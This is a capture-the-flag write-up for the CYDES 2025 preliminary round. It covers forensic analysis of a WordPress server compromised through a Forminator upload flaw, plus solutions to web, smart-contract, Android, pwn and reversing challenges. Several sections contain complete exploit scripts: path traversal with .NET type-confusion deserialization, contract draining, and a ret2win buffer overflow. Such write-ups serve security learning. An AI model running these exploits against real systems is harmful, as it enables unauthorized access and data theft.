# Misc ## Sanity Check Third part of the flag - `Badge to Breach: ICS Cyber Siege!`  Second part of the flag - `ass1gnrol3s`  First part of the flag - `re4dtherules`  flag `prelim{re4dtherules_ass1gnrol3s_Badge to Breach: ICS Cyber Siege!}` # Forensic ## [0] - Forensic Sanity Check We were first given a linux server image `webserver_image.img` that was compromised by a threat actor. The first flag is located inside the gdrive link that provides the server image. `https://drive.google.com/drive/folders/1WVtgX9iRCgv20AhcITdq_s3F9kF64MKw`  flag `prelim{warming_up_your_forensics_skills_for_real}` ## [1] - Initial vector Next task is to identify the CVE used by the attacker to gain initial access to the server and the file that has been dropped by the attacker using the PoC. Logically, since the attacker most likely gain foothold via the web service, we can take a look at the `/var/log/apache2/access.log` to identify their activities. A review of the `access.log` indicates that the website is most likely running WordPress due to the presence of `/wp-admin` endpoint.  Moreover, after analyzing the disk image using FTK imager the location of the web service directory `/var/www/html/` also verifies that it is indeed running WordPress  ### Identifying CVE WordPress is famous for its plugins that everyone can use. However, outdated plugins often have security vulnerabilities. Taking a look inside `/var/www/html/wp-content/plugins/` this website is using 4 different plugins and one of them is `forminator`.  Looking at the content of `forminator.php` it is stated that it is running on `version 1.24.6`, which is vulnerable to [CVE-2023-4596](https://www.exploit-db.com/exploits/51664).  ### Understanding the PoC 1. **File Upload Bypass**: Attacker uploads PHP file through vulnerable `postdata` field 2. **Extension Validation Bypass**: Malicious files bypass file type restrictions 3. **Code Execution**: Uploaded PHP shell allows remote command execution To find out if the attacker is using this specific PoC we can analyze all of the previous file that has been uploaded to the website which can be located at `/var/www/html/wp-content/uploads/`. Here the threat actor dropped multiple malicious file into the website in `/var/www/html/wp-content/uploads/2025/03` and `/var/www/html/wp-content/uploads/2025/06` directory.  In `/var/www/html/wp-content/uploads/2025/06` is where the threat actor managed to gain foothold by uploading webshell `istockphoto-1327339401-612x612-2-300x150.php`. flag `prelim{CVE-2023-4596_6abb43dc87e07140ba94beafda03baad}` ## [5] - Persistent (Unintended) Apart from plugins, during the enumeration phase we suspected that one of the WordPress themes might be using an outdated version.  Analyzing one of the themes `twentytwentyfour` there is `theme.php` file that contains a pastebin url. https://pastebin.com/ELxiB3t1 Visiting the url gave us the flag. flag `prelim{b4yuf3dr4_m1n1_web5h3ll_p3rs15t3nt}` # Web ## Baby Web ### The Vulnerability - Type Confusion Code expects `query` as a string but Express.js body parser converts `query[]` into an array, causing security bypass. ### Vulnerable Code ```javascript const query = req.body.query; // Can be string OR array if (query.includes("String")) { return res.send("Access Denied"); // Filter bypass } if (query.includes(key)) { return res.send("Flag: " + flag); // Authentication check } ``` ### Exploit Script ```python #!/usr/bin/env python3 import requests # Configuration TARGET_URL = "http://localhost:10009" def exploit(): print(f"[+] Target: {TARGET_URL}") print("[+] Exploiting JavaScript type confusion...") data = { 'query[]': "randomBytes(16).toString('hex')" } response = requests.post(f"{TARGET_URL}/search", data=data) if "Here is your flag:" in response.text: print("[+] SUCCESS! Flag found:") # Extract flag from response flag_start = response.text.find("Here is your flag:") + len("Here is your flag:") flag_end = response.text.find("</pre>", flag_start) flag = response.text[flag_start:flag_end].strip() print(f"[+] {flag}") else: print("[!] Exploit failed") print(f"[DEBUG] Response: {response.text}") if __name__ == "__main__": exploit() ``` flag `prelim{i_was_confused_ab_what_to_make--so_i_made_a_js_type_confusion_baby_challenge_ehhe}` ## Notesafe: Trust Issues Looking at the file structure of this challenge it looks it is ASP.NET Core web application, due to the presence of `Microsoft.AspNetCore.Authentication.JwtBearer.dll` file ``` C:. │ docker-compose.yml │ flag.txt │ NoteSafe.zip │ README.md │ └───NoteSafe ├───NoteSafe │ │ appsettings.Development.json │ │ appsettings.json │ │ Microsoft.AspNetCore.Authentication.JwtBearer.dll │ │ Microsoft.Data.Sqlite.dll │ │ NoteSafe.dll ``` Another useful information is that the flag is located at `root` and apart from that, we discovered that there are custom classes being integrated into the web application which is compiled into `NoteSafe.dll` To get our hands into the classes, we can decompile it using `https://www.decompiler.com/`. After we managed to decompile it here is the vulnerable classes available inside it. ``` NoteSafe.Helpers │ JsonHelper.cs ← ROOT VULNERABILITY (enabled the attack) NoteSafe.Services │ NoteService.cs ← ENTRY POINT (called vulnerable JsonHelper) │ FileSystemService.cs ← FILE READ GADGET (successfully used) ``` ### 1. FilesController.cs - Directory Traversal in File Listing ```csharp // Vulnerable endpoint in FilesController.cs [HttpGet("list")] public IActionResult ListFiles(string folder) { // VULNERABILITY: No path validation or sanitization var targetPath = Path.Combine(baseDirectory, folder); // This allows "../" sequences to escape the intended directory var files = Directory.GetFiles(targetPath); return Json(files); } ``` **Request:** `GET /api/files/list?folder=../` **Response:** ```json { "currentPath":"/app/../", "files":[ { "name":"flag-BqBEGkm6F8.txt", "path":"/app/../flag-BqBEGkm6F8.txt","size":36, "lastModified":"2025-06-19T20:56:28.7842621+00:00" },` ... } ``` ### 2. JsonHelper.cs - Unsafe Deserialization ```csharp TypeNameHandling = (TypeNameHandling)3, // TypeNameHandling.All ``` **Why vulnerable:** Allows `$type` attacks to create any .NET class ### 3. FileSystemService.cs - Dangerous Getter ```csharp public string FileContents { get { return File.ReadAllText(FilePath); } // File read in getter } ``` **Why vulnerable:** Property getter performs file I/O operations **Request:** ```http POST /api/notes HTTP/1.1 Content-Type: application/json { "$type": "NoteSafe.Services.FileSystemService, NoteSafe", "FilePath": "/app/../flag-BqBEGkm6F8.txt" } ``` **Response:** ```json Invalid object type. Debug info: { "FilePath":"/app/../flag-pcBcmDqCak.txt", "FileContents":"prelim{buzzw0rd5_4r3_n0t_3ncrypt10n}" } ``` ### Complete Attack Flow: Register a new account -> Login -> **directory traversal** → Discover flag filename → **JSON deserialization** → File read gadget → Extract Flag ### Exploit Script ```python import requests import re TARGET_URL = "http://152.42.220.146:54984" USERNAME = "testuser" PASSWORD = "testpass123" def get_antiforgery_token(session, url): """Get anti-forgery token from page""" response = session.get(url) match = re.search(r'name="__RequestVerificationToken" type="hidden" value="([^"]+)"', response.text) return match.group(1) if match else None def exploit(): session = requests.Session() print(f"[+] Target: {TARGET_URL}") # Try registration first print("[+] Attempting registration...") token = get_antiforgery_token(session, f"{TARGET_URL}/Account/Register") register_data = { 'Username': USERNAME, 'Password': PASSWORD, 'ConfirmPassword': PASSWORD } if token: register_data['__RequestVerificationToken'] = token reg_response = session.post(f"{TARGET_URL}/Account/Register", data=register_data, allow_redirects=True) # Check if registration worked (should redirect to dashboard) if 'Dashboard' not in reg_response.text and 'dashboard' not in reg_response.url.lower(): print("[!] Registration failed, trying login...") # Try login instead login_token = get_antiforgery_token(session, f"{TARGET_URL}/Account/Login") login_data = { 'Username': USERNAME, 'Password': PASSWORD } if login_token: login_data['__RequestVerificationToken'] = login_token login_response = session.post(f"{TARGET_URL}/Account/Login", data=login_data, allow_redirects=True) if 'Dashboard' not in login_response.text and 'dashboard' not in login_response.url.lower(): print("[!] Both registration and login failed!") return else: print("[+] Login successful!") else: print("[+] Registration successful!") # Step 1: Directory traversal to find flag file print("[+] Finding flag file...") response = session.get(f"{TARGET_URL}/api/files/list?folder=../") # Extract flag filename from JSON response flag_file = None if response.status_code == 200: # Look for flag file in JSON response flag_match = re.search(r'"name":"(flag-[A-Za-z0-9]+\.txt)"', response.text) if flag_match: flag_file = flag_match.group(1) print(f"[+] Found flag file: {flag_file}") else: print("[!] No flag file found in directory listing") print(f"[DEBUG] Response: {response.text}") return else: print(f"[!] Directory traversal failed: {response.status_code}") return # Step 2: JSON deserialization to read flag print("[+] Reading flag file...") payload = { "$type": "NoteSafe.Services.FileSystemService, NoteSafe", "FilePath": f"/{flag_file}" } headers = {'Content-Type': 'application/json'} response = session.post(f"{TARGET_URL}/api/notes", json=payload, headers=headers) # Extract flag content if 'FileContents' in response.text: match = re.search(r'"FileContents":"([^"]*)"', response.text) if match: content = match.group(1) print(f"[+] FLAG: {content}") else: print("[!] Could not extract flag content") else: print(f"[!] No FileContents in response: {response.text}") if __name__ == "__main__": exploit() ``` flag `prelim{buzzw0rd5_4r3_n0t_3ncrypt10n}` # Blockchain ## Bank ### I believe this decentralized shenanigans is too naive. So here's a bank for yall We need to drain the Bank contract so that it no longer holds any NFTs (i.e., `bank.total() == 0`). The key vulnerability lies in the `Bank.withdraw()` function: ```solidity function withdraw(uint256[] calldata _tokenIds) payable external { for (uint256 i = 0; i < _tokenIds.length; i++) { nft.safeTransferFrom(address(this), msg.sender, _tokenIds[i]); total -= 1; } } ``` There are no access controls or ownership checks. This means that any external user can withdraw any token held by the Bank. ### Exploit Steps 1. Use the `Setup` contract's `bank()` function to get the Bank contract address. 2. Call `withdraw([0])` on the Bank contract to withdraw the NFT with ID 0 (originally donated by the Setup contract). 3. Once the NFT is withdrawn, `bank.total()` will be 0. 4. Verify that `Setup.isSolved()` returns `true`. ### Exploit Script Below is the working bash script using Foundry's `cast` CLI: ```bash #!/usr/bin/env bash RPC_URL="http://116.203.176.73:4447/cbbdd542-ae74-43c3-8011-3b71e803e03a" PRIVATE_KEY="0x9b3d674f2fdf1bb7fcb5438d38cbd69eb2bea4b8d66c73b42a6432896a2cf53f" SETUP_ADDR="0x60a4A317F11351960456Ae5d24550EDD48Bba17a" # 1) Get Bank contract address BANK_ADDR=$(cast call "$SETUP_ADDR" "bank()(address)" --rpc-url "$RPC_URL") echo "[+] Bank at $BANK_ADDR" # 2) Exploit: Withdraw token ID 0 from Bank cast send "$BANK_ADDR" "withdraw(uint256[])" "[0]" \ --private-key "$PRIVATE_KEY" \ --rpc-url "$RPC_URL" # 3) Check success IS_SOLVED=$(cast call "$SETUP_ADDR" "isSolved()(bool)" --rpc-url "$RPC_URL") echo "[+] Solved: $IS_SOLVED" ``` Flag: ``prelim{pretty_simple_for_a_start}`` ## Size Does Not Matter ### I don't believe size matters, so I made a challenge about it. #### I get first blood because of https://chatgpt.com/share/685f39d7-474c-8006-817e-eb583d6d5763 The challenge revolves around a `Box` contract with three stages (`aquastage1`, `aquastage2`, and `aquastage3`). Each stage checks the size of a contract's code using the `extcodesize` opcode. We must pass all three stages and then call `solve(address)` with the same address that passed the stages to trigger `Setup.isSolved() == true`. Here’s the breakdown: ```solidity function aquastage1(address _contract) public { uint256 size; assembly { size := extcodesize(_contract) } require(size < 0x7, "ooki sugiru"); stage1[_contract] = true; } function aquastage2(address _contract) public { require(stage1[_contract], "mada desu"); uint256 size; assembly { size := extcodesize(_contract) } require(size == 0x0, "chiisa sugiru"); stage2[_contract] = true; } function aquastage3(address _contract) public { require(stage2[_contract], "mada desu"); uint256 size; assembly { size := extcodesize(_contract) } require(size < 0x7, "chigau"); stage3[_contract] = true; } ``` - `extcodesize` of an Externally Owned Account (EOA) is always 0 - This means an EOA passes: - `stage1`: 0 < 7 - `stage2`: 0 == 0 - `stage3`: 0 < 7 Thus, we don’t need to deploy a contract — we just use our wallet address as the `_contract` argument in all calls. ### Exploit Steps 1. Use the `Setup` contract to get the address of the `Box` contract. 2. Call each of the three stage functions on the Box contract, passing in our own EOA. 3. Call `solve()` on the Box contract, again passing our EOA. 4. Confirm the challenge is solved by checking `Setup.isSolved()`. ### Exploit Script Here is the full exploit script in bash using Foundry’s `cast` CLI: ```bash #!/usr/bin/env bash set -euo pipefail RPC_URL="http://116.203.176.73:4447/cbbdd542-ae74-43c3-8011-3b71e803e03a" PRIVATE_KEY="0x9b3d674f2fdf1bb7fcb5438d38cbd69eb2bea4b8d66c73b42a6432896a2cf53f" SETUP_ADDR="0x60a4A317F11351960456Ae5d24550EDD48Bba17a" # Derive EOA address from private key EOA_ADDR=$(cast wallet address --private-key "$PRIVATE_KEY") echo "[+] Using EOA $EOA_ADDR" # 1) Get the Box contract address BOX_ADDR=$(cast call "$SETUP_ADDR" "box()(address)" --rpc-url "$RPC_URL") echo "[+] Box at $BOX_ADDR" # 2) Stage 1 cast send "$BOX_ADDR" "aquastage1(address)" "$EOA_ADDR" \ --private-key "$PRIVATE_KEY" \ --rpc-url "$RPC_URL" echo "[+] Stage 1 complete" # 3) Stage 2 cast send "$BOX_ADDR" "aquastage2(address)" "$EOA_ADDR" \ --private-key "$PRIVATE_KEY" \ --rpc-url "$RPC_URL" echo "[+] Stage 2 complete" # 4) Stage 3 cast send "$BOX_ADDR" "aquastage3(address)" "$EOA_ADDR" \ --private-key "$PRIVATE_KEY" \ --rpc-url "$RPC_URL" echo "[+] Stage 3 complete" # 5) Solve cast send "$BOX_ADDR" "solve(address)" "$EOA_ADDR" \ --private-key "$PRIVATE_KEY" \ --rpc-url "$RPC_URL" echo "[+] Solved!" # 6) Check if challenge is solved IS_SOLVED=$(cast call "$SETUP_ADDR" "isSolved()(bool)" --rpc-url "$RPC_URL") echo "[+] isSolved(): $IS_SOLVED" ``` Flag: ``prelim{small_and_big_schrodingerbox}`` ## Oasis ### In a vast sahara, lost, you were. In a Sapphire blue, with secret, you shall rest. ### 0x0e9A1A1252Db85FC293822c961dF96E504974c1C (testnet) prelim{checksumedsecrethere} The name Oasis seems very web3 blockchain name, therefore i chatgpt and know the contract is deployed on Oasis Sapphire. https://explorer.oasis.io/testnet/sapphire/ I search for the contract: 0x0e9A1A1252Db85FC293822c961dF96E504974c1C (testnet) I go through the transactions and found out one transaction that do contract call successfully  It call with the following calldata: ```0x6c39be8b000000000000000000000000fc044f87f2d158253348ff0fd3670f341ba29c5e``` Which decodes to: ```function ???(address _secret)``` with: ```_secret = 0xfc044f87f2d158253348ff0fd3670f341ba29c5e``` Since the challenge want checksumed secret ``` PS C:\Users\XXX\Downloads\Oasis\vault-verify> node -e "import { getAddress } from 'ethers'; console.log(getAddress('0xfc044f87f2d158253348ff0fd3670f341ba29c5e'))" --input-type=module 0xFc044F87f2D158253348fF0fd3670f341bA29c5E ``` Flag: ``prelim{0xFc044F87f2D158253348fF0fd3670f341bA29c5E}`` ## Simple Guess ### Let's see how cool you are on pulling things ("Get Over Here!!!!") There is an apk, so i throw to https://www.decompiler.com/ to decompile. From MainActivity.java ``` package com.example.simpleguess; import android.content.Context; import android.os.Bundle; import android.util.Base64; import android.util.Log; import androidx.activity.ComponentActivity; import androidx.activity.compose.ComponentActivityKt; import androidx.compose.runtime.CompositionContext; import androidx.compose.runtime.internal.ComposableLambdaKt; import java.security.spec.KeySpec; import javax.crypto.Cipher; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.SecretKeySpec; import kotlin.Metadata; import kotlin.Result; import kotlin.ResultKt; import kotlin.jvm.internal.Intrinsics; import kotlin.text.Charsets; import kotlin.text.StringsKt; @Metadata(d1 = {"\u0000B\n\u0002\u0018\u0002\n\u0002\u0018\u0002\n\u0002\b\u0003\n\u0002\u0010\u0002\n\u0000\n\u0002\u0018\u0002\n\u0000\n\u0002\u0018\u0002\n\u0000\n\u0002\u0010\u000e\n\u0000\n\u0002\u0010\u0012\n\u0000\n\u0002\u0010\b\n\u0002\b\u0002\n\u0002\u0018\u0002\n\u0002\b\u0002\n\u0002\u0018\u0002\n\u0002\b\u0005\b\u0007\u0018\u00002\u00020\u0001B\u0007¢\u0006\u0004\b\u0002\u0010\u0003J\u0012\u0010\u0004\u001a\u00020\u00052\b\u0010\u0006\u001a\u0004\u0018\u00010\u0007H\u0014J*\u0010\b\u001a\u00020\t2\u0006\u0010\n\u001a\u00020\u000b2\u0006\u0010\f\u001a\u00020\r2\b\b\u0002\u0010\u000e\u001a\u00020\u000f2\b\b\u0002\u0010\u0010\u001a\u00020\u000fJ&\u0010\u0011\u001a\u00020\u00122\u0006\u0010\n\u001a\u00020\u000b2\u0006\u0010\f\u001a\u00020\r2\u0006\u0010\u000e\u001a\u00020\u000f2\u0006\u0010\u0010\u001a\u00020\u000fJ\u0016\u0010\u0013\u001a\u00020\u000b2\u0006\u0010\u0014\u001a\u00020\u00152\u0006\u0010\n\u001a\u00020\u000bJ\u0016\u0010\u0016\u001a\u00020\u000b2\u0006\u0010\u0017\u001a\u00020\u00152\u0006\u0010\u0018\u001a\u00020\u000b¨\u0006\u0019²\u0006\n\u0010\u001a\u001a\u00020\u000bXŠŽ\u0002"}, d2 = {"Lcom/example/simpleguess/MainActivity;", "Landroidx/activity/ComponentActivity;", "<init>", "()V", "onCreate", "", "savedInstanceState", "Landroid/os/Bundle;", "gk", "Ljavax/crypto/spec/SecretKeySpec;", "c", "", "s", "", "i", "", "k", "ksp", "Ljava/security/spec/KeySpec;", "cutf", "co", "Landroid/content/Context;", "decp", "cot", "p", "app_release", "key"}, k = 1, mv = {2, 0, 0}, xi = 48) /* compiled from: MainActivity.kt */ public final class MainActivity extends ComponentActivity { public static final int $stable = 0; /* access modifiers changed from: protected */ public void onCreate(Bundle bundle) { super.onCreate(bundle); ComponentActivityKt.setContent$default(this, (CompositionContext) null, ComposableLambdaKt.composableLambdaInstance(318533092, true, new MainActivity$onCreate$1(this)), 1, (Object) null); } public static /* synthetic */ SecretKeySpec gk$default(MainActivity mainActivity, String str, byte[] bArr, int i, int i2, int i3, Object obj) { if ((i3 & 4) != 0) { i = 65536; } if ((i3 & 8) != 0) { i2 = 256; } return mainActivity.gk(str, bArr, i, i2); } public final SecretKeySpec gk(String str, byte[] bArr, int i, int i2) { Intrinsics.checkNotNullParameter(str, "c"); Intrinsics.checkNotNullParameter(bArr, "s"); return new SecretKeySpec(SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256").generateSecret(ksp(str, bArr, i, i2)).getEncoded(), "AES"); } public final KeySpec ksp(String str, byte[] bArr, int i, int i2) { Intrinsics.checkNotNullParameter(str, "c"); Intrinsics.checkNotNullParameter(bArr, "s"); char[] charArray = str.toCharArray(); Intrinsics.checkNotNullExpressionValue(charArray, "toCharArray(...)"); return new PBEKeySpec(charArray, bArr, i, i2); } public final String decp(Context context, String str) { Object obj; Object obj2 = "Thank You"; Intrinsics.checkNotNullParameter(context, "cot"); Intrinsics.checkNotNullParameter(str, "p"); String string = context.getString(R.string.salt); Intrinsics.checkNotNullExpressionValue(string, "getString(...)"); byte[] bytes = string.getBytes(Charsets.UTF_8); Intrinsics.checkNotNullExpressionValue(bytes, "getBytes(...)"); byte[] decode = Base64.decode(bytes, 0); String string2 = context.getString(R.string.iv); Intrinsics.checkNotNullExpressionValue(string2, "getString(...)"); byte[] bytes2 = string2.getBytes(Charsets.UTF_8); Intrinsics.checkNotNullExpressionValue(bytes2, "getBytes(...)"); byte[] decode2 = Base64.decode(bytes2, 0); String string3 = context.getString(R.string.ecp); Intrinsics.checkNotNullExpressionValue(string3, "getString(...)"); Intrinsics.checkNotNull(decode); SecretKeySpec gk$default = gk$default(this, str, decode, 0, 0, 12, (Object) null); Cipher instance = Cipher.getInstance("AES/CBC/PKCS5Padding"); instance.init(2, gk$default, new IvParameterSpec(decode2)); try { Result.Companion companion = Result.Companion; byte[] doFinal = instance.doFinal(Base64.decode(string3, 0)); Intrinsics.checkNotNull(doFinal); Log.d("Decrypted", new String(doFinal, Charsets.UTF_8)); obj = Result.m7416constructorimpl(obj2); } catch (Throwable th) { Result.Companion companion2 = Result.Companion; obj = Result.m7416constructorimpl(ResultKt.createFailure(th)); } if (Result.m7419exceptionOrNullimpl(obj) == null) { obj2 = obj; } return (String) obj2; } public final String cutf(Context context, String str) { Intrinsics.checkNotNullParameter(context, "co"); Intrinsics.checkNotNullParameter(str, "c"); CharSequence charSequence = str; Appendable sb = new StringBuilder(); int length = charSequence.length(); for (int i = 0; i < length; i++) { char charAt = charSequence.charAt(i); if (Character.isDigit(charAt)) { sb.append(charAt); } } String sb2 = ((StringBuilder) sb).toString(); Intrinsics.checkNotNullExpressionValue(sb2, "toString(...)"); String take = StringsKt.take(sb2, 4); if (Intrinsics.areEqual((Object) take, (Object) "")) { return "Nuh Uh"; } return decp(context, take); } } ``` cutf(Context, String) Extracts digits from a string and takes the first 4 digits. If no digits found, it returns "Nuh Uh". Otherwise, it uses the digits as a decryption password: ``` return decp(context, take); ``` decp(Context, String) Performs AES decryption: Gets: - a Base64-encoded salt from R.string.salt - a Base64-encoded IV from R.string.iv - a Base64-encoded encrypted string from R.string.ecp Uses PBKDF2 with SHA-256 to derive an AES key from: - user-provided password (String str, usually 4-digit code) - the salt Decrypts the encrypted data using AES in CBC mode with PKCS5 padding. Logs decrypted result (Log.d("Decrypted", ...)) Returns "Thank You" if successful. gk(...) and ksp(...) - Helper methods for generating the SecretKeySpec used in AES: - ksp() builds a PBKDF2 KeySpec using the password and salt. - gk() runs PBKDF2 with that spec to create a 256-bit AES key. From strings.xml ``` <string name="salt">S7n8CyjFt28W6JOssy1OPg==</string> <string name="iv">KF/M4Oz7SyDQOY5PWF76yw==</string> <string name="ecp">M4EKATajtPe4ry4Vs3W0SQNNoIdSZnDdtdAArgeVZRX1WVod+/IOHiQ8uz3XeAJW</string> ``` We brute-force all 4-digit numbers (0000–9999), and for each: 1. Derive a key using PBKDF2-HMAC-SHA256. 2. Decrypt the base64 ciphertext with AES-256-CBC. 3. Strip PKCS#7 padding and validate UTF-8 text. ``` from base64 import b64decode import hashlib from Crypto.Cipher import AES salt = b64decode("S7n8CyjFt28W6JOssy1OPg==") iv = b64decode("KF/M4Oz7SyDQOY5PWF76yw==") ciphertext = b64decode("M4EKATajtPe4ry4Vs3W0SQNNoIdSZnDdtdAArgeVZRX1WVod+/IOHiQ8uz3XeAJW") for i in range(10000): pwd = f"{i:04d}".encode() key = hashlib.pbkdf2_hmac('sha256', pwd, salt, 65536, dklen=32) cipher = AES.new(key, AES.MODE_CBC, iv) pt_padded = cipher.decrypt(ciphertext) pad = pt_padded[-1] if 1 <= pad <= 16 and pt_padded[-pad:] == bytes([pad]) * pad: try: msg = pt_padded[:-pad].decode('utf-8') except: continue if all(32 <= ord(c) < 127 for c in msg): print(f"[+] Found key: {i:04d}") print("Decrypted message:", msg) break ``` Key: 1435 Flag: ``prelim{All_Y0u_N33d_1s_F0ur_D1g1tS}`` ## Mindfulness ### It's free for you. I am sorry but, https://chatgpt.com/share/685efb8b-2c4c-8006-b4c7-364fc591bdb3 Flag: ``prelim{just_a_warm_up_for_u_lets_finish_the_next_challs}`` ## Mindreader-Revenge ### Thinking.. In this challenge, we need to deduce the hidden binary vector `ans[]` that satisfies the equation: \[ \sum_{i=0}^{30} r_i \cdot \text{ans}[i] = S \] where `r[]` is a list of random numbers and `S` is the target sum. We will solve this using a **Meet-in-the-Middle** approach, which efficiently reduces the problem size by splitting `r[]` into two halves and solving each half independently. ## Steps 1. **Split** the list `r` into two halves, `rA` and `rB`. 2. **Generate all subsets** of each half, keeping track of the sum and corresponding bitmask. 3. **Sort** one half by the sum of the subsets. 4. **Binary search** for matching subsets in the other half to find the combination that sums to `S`. 5. **Reconstruct** the full binary vector `ans[]`. ## Python Code ``` #!/usr/bin/env python3 import itertools, bisect # Paste in exactly what the game printed: r = [3289349668835601, 2238617847261870, 338467404754623, 1323107197256584, 968753837035125, 2953180891574617, 3151096563121758, 1631722403268384, 2264836288327676, 2891821185140092, 2518541275823582, 3569976426828859, 1510156352373074, 123459440216607, 1806695494300801, 2232029635824320, 2094874960570101, 1044449155332050, 3523709387831264, 470249174130274, 383206693977279, 1788323723679315, 2241304010652199, 581036068043273, 429007313690112, 1411286211720268, 512378962009482, 363567412476798, 2463272655962924, 1223395222683359, 1526187481792512] # length 31 S = 17879120755154543 def mitm(r, S): n = len(r) k = n // 2 rA, rB = r[:k], r[k:] # Generate all (sum, mask) for A A = [(sum(rA[i] for i in range(k) if (mask>>i)&1), mask) for mask in range(1<<k)] # Likewise for B m = n - k B = [(sum(rB[i] for i in range(m) if (mask>>i)&1), mask) for mask in range(1<<m)] # Sort B by sum B.sort(key=lambda x: x[0]) B_sums = [s for s, _ in B] for sumA, maskA in A: need = S - sumA # binary search in B_sums i = bisect.bisect_left(B_sums, need) if i < len(B_sums) and B_sums[i] == need: maskB = B[i][1] # Reconstruct the full ans bits ans = [(maskA >> i) & 1 for i in range(k)] \ + [(maskB >> i) & 1 for i in range(m)] return ans return None ans = mitm(r, S) if ans is None: print("No solution found!") else: # Convert to yes/no for bit in ans: print("yes" if bit else "no") ``` Flag: ``prelim{mindreader_master_sksksksksk}`` ## Baby Armageddon ### There has been news of a new company called* "Baby Armageddon Corp."* and they seem to have the capabilities of destroying the entire world with one single attack on Earth. But there has been rumors that the company is ran by literal babies and they have really terrible security. ### Can you break through and obtain their Armageddon device through their QnA server? ``` from pwn import * # --- Configuration --- # Set to True to run locally, False to connect to the remote server LOCAL = False REMOTE_IP = '152.42.220.146' REMOTE_PORT = 34247 # Use the latest port from your output # --------------------- elf = ELF('./challenge') rop = ROP(elf) if LOCAL: p = process('./challenge') else: p = remote(REMOTE_IP, REMOTE_PORT) # Address of the function we want to call win_address = elf.symbols['armageddon'] # Find a 'ret' gadget for stack alignment ret_gadget = rop.find_gadget(['ret'])[0] log.info(f"Address of armageddon(): {hex(win_address)}") log.info(f"Address of 'ret' gadget: {hex(ret_gadget)}") # The offset to reach the return address on the stack offset = 136 # --- Construct the ROP Chain --- payload = b'A' * offset payload += p64(ret_gadget) # Align the stack payload += p64(win_address) # Call the win function # --- EXPLOIT --- # On local, we can wait for the prompt. if LOCAL: p.recvuntil(b"What is your question?\n") # For remote, DO NOT wait for a prompt. It never comes. # Just send the payload immediately after connecting. log.info("Sending payload...") p.sendline(payload) # Interact to see the flag log.info("Switching to interactive mode...") p.interactive() # An alternative to interactive, which just prints all output and closes. # print(p.recvall().decode()) ``` Flag: ``prelim{th1S_15_tH3_p4s5w0rD_f0r_4rm463dd0N}`` Discussion with Gemini: https://drive.google.com/file/d/1ZnWXNOQYq7NR4-PB5w9Jf6wHPZ2kkp0a/view?usp=sharing ## Crack Me ### Just another Crack Me, yeah crack me. #### Main Execution Flow (main function) The main function controls the program's primary logic: It prints a welcome message and a prompt: CYDES 2025 Prelim EZ Challenge…\nEnter password:. It reads the user's input password into a buffer s. It calls sub_140021608(&s) to validate the password. If the validation fails (sub_140021608 returns 0), it prints "Access Denied!". If the validation succeeds (sub_140021608 returns a non-zero value), it calls another function, sub_14002179c, which prepares a success message. Finally, it prints the success message. ##### Password Validation (sub_140021608) This function is the core of the password check. It appears very complex at first glance, containing what looks like a custom Virtual Machine (VM) and a custom hashing algorithm. However, a closer look reveals the true, simpler logic, with the complex parts acting as red herrings. The actual checks performed are: The password length must be exactly 20 characters. The password must start with CTF{ and end with }. This means the content inside the braces is 15 characters long. The 15-character content must contain the substring "1597". This is verified by the helper function sub_140021c40. The rest of the function, including the VM implemented in sub_14002192c and the custom SHA-1-like hash in sub_140021b20, is elaborate obfuscation. The code that checks for "1597" also modifies the first instruction of the VM's bytecode, effectively making the VM non-functional. This confirms that the VM is a decoy and does not participate in the actual flag validation. Any password matching the format CTF{...1597...} of the correct length will pass this check. #### Flag Revelation (sub_14002179c) When the password validation succeeds, this function is called. Its purpose is to generate the success message, which contains the flag. It does this by decoding a hardcoded byte array. The decoding logic is a simple XOR cipher: each byte in the hardcoded array is XORed with the key 0x7f. Hardcoded Data: 3c 10 11 18 0d 1e 0b 0a 13 1e 0b 16 10 11 0c 5e 5f 39 13 1e 18 45 5f 0f 0d 1a 13 16 12 04 19 4f 0d 20 48 17 4c 20 0f 4f 08 4c 0d 20 4f 19 20 4e 4f 09 4c 02 XOR Key: 0x7f Performing the XOR operation on each byte reveals the plaintext message. Decoding the Flag Let's decode the first few bytes as an example: 0x3c ^ 0x7f = 0x43 which is the ASCII character 'C'. 0x10 ^ 0x7f = 0x6f which is the ASCII character 'o'. 0x11 ^ 0x7f = 0x6e which is the ASCII character 'n'. ...and so on. Applying this to the entire byte array yields the following string: Congratulations! Flag: prelim{f0r_7h3_p0w3r_0f_10v3} The program prints this decoded message upon successful validation. The flag is the string contained within this message. Flag: ``prelim{f0r_7h3_p0w3r_0f_10v3}``